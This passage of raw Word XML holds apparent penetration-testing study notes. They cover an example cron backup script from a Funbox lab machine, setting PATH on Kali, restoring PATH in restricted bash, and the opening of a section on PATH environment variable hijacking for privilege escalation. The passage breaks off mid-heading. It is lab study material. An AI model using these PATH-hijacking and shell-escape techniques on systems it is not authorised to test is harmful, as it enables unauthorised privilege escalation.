        <w:t xml:space="preserve">Examples of files ran by cron jobs (to help build intuition for identifying them)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000025DE">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000025DF">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="901700"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="232" name="image225.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image225.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId80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25E0">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1168"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This is from the </w:t>
      </w:r>
      <w:hyperlink r:id="rId803">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Funbox</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> PG Play</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000025E1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1168"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This script creates a backup archive of the /var/www/html directory and stores it as html.tar in the /home/funny directory.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000025E2">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000025E3">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000025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E5">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_9x92539ms9bg" w:id="332"/>
      <w:bookmarkEnd w:id="332"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">How to add directory to my path on Kali</w:t>
        <w:br w:type="textWrapping"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000025E6">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_rnemcjhizuow" w:id="333"/>
      <w:bookmarkEnd w:id="333"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Permanently:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000025E7">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000025E8">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Let's say I want to move</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> ~/bin</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> to my PATH</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000025E9">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000025EA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1469"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">subl ~/.zshrc</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000025EB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1469"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Add this line to the end:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000025EC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1469"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">export PATH=</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">"$HOME/bin</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">:$PATH"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000025ED">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1469"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">$HOME </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">just means </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">~</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, do this is equivalent to ~/bin</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000025EE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1469"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Avoid using</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> ~</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> when specifying path in PATH</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000025EF">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1469"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">source ~/.zshrc</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000025F0">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000025F1">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000025F2">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_1taagdzcks2i" w:id="334"/>
      <w:bookmarkEnd w:id="334"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Temporarily:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000025F3">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000025F4">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">If you run the command directly:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">export PATH="</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">$HOME/bin</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">:$PATH"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000025F5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="517"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">It takes effect immediately, but only in your current shell session.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000025F6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="517"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Once you close that terminal, the change is gone.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000025F7">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000025F8">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000025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FA">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000025FB">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_8ygci8556ved" w:id="335"/>
      <w:bookmarkEnd w:id="335"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">PATH environment</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000025FC">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000025FD">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000025FE">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Sometimes (often in restricted bash), /bin and /sbin and other stuff is not added to the PATH, so we can't use commands. To fix this, use this command</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000025FF">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="628"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">export PATH=$PATH:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002600">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="628"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This adds common system binary directories (like sbin, bin) to your current shell's PATH variable. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002601">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="628"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002602">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002603">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">And look into the "</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">rbash (restricted bash)</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">"</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> section for more information about restricted bash</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002604">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000026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06">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002607">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_meu1yx552cek" w:id="336"/>
      <w:bookmarkEnd w:id="336"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">PATH environment variable hijacking</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002608">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002609">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Another example of this is seen in the OSCP B .149</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000260A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1121"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Here is how to add your own path to the start of the PATH variable</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000260B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1121"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">PATH=/home/john:$PATH</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000260C">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000260D">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000260E">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_vmofjim6j3gq" w:id="337"/>
      <w:bookmarkEnd w:id="337"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">How to tell if a binary/command is hijackable</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000260F">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">In the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
